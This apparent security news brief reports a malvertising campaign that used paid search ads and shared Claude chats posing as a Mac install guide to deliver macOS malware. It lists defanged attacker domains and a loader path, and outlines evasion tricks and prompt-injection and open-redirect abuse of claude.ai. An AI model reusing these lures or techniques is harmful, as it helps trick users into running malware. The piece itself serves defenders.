Threat Actors Use Claude Chats to Deliver macOS Malware

Security reporting shows a malvertising campaign leveraging paid Google Search results and public Claude shared chats to distribute macOS malware. According to BleepingComputer, researcher Berk Albayrak shared findings on LinkedIn on May 10 identifying a shared Claude chat that posed as an official "Claude Code on Mac" installation guide and instructed users to paste a Terminal command that silently fetched and ran code (BleepingComputer). ITSecurityNews reports the same campaign distributes a variant associated with MacSync (ITSecurityNews). Hackread and Oasis Security coverage frames related research as "Claudy Day," describing techniques for embedding hidden instructions and abusing open redirects on claude.ai to get malicious links approved as ads (Hackread).

BleepingComputer documented that the shared chat content included base64-encoded commands that retrieve a loader.sh script from domains such as hxxp://customroofingcontractors[.]com and hxxps://bernasibutuwqu2[.]com/debug/loader.sh?build=... (BleepingComputer). The observed loader.sh is a Gunzip-compressed shell script that runs primarily in memory, reducing disk artifacts, and the reporting notes the server returned uniquely obfuscated payload contents per request to evade signature-based detection (BleepingComputer). BleepingComputer also observed behavioral checks in one variant, including a keyboard-layout check to avoid Russian and CIS-region victims (BleepingComputer).

Attack chains that combine malvertising with prefilled or shared AI chat content exploit two trust vectors: search-ad ranking and the perceived legitimacy of platform-hosted artifacts. For practitioners, in-memory compressed loaders and per-request obfuscation increase the value of runtime detection and network telemetry over static file scanning.

Industry reporting highlights two complementary enablers for this campaign. First, paid Google Search ads can point users to domains that mimic legitimate services; BleepingComputer documents sponsored search results for queries like "Claude mac download" linking to malicious instructions (BleepingComputer). Second, Oasis Security research summarized by Hackread shows how hidden prompt injection and open-redirect patterns can be chained to make malicious content appear to originate from claude.ai and bypass user suspicion (Hackread). Together, these factors let attackers craft highly credible social engineering content that leads to single-command execution on macOS.

Observers should track:

• •takedown actions or statements from Anthropic or Google regarding abused shared-chat links and ad approvals
• •additional indicators of compromise tied to MacSync variants and the domains cited in reporting
• •research on mitigations for hidden prompt injection and open-redirect abuse in public AI assistant artifacts

Monitor DNS and outbound connections to the domains named in reporting, instrument Terminal command launches and child process creation on macOS endpoints, and prioritize runtime telemetry that can detect compressed, in-memory shell stages and per-request payload obfuscation.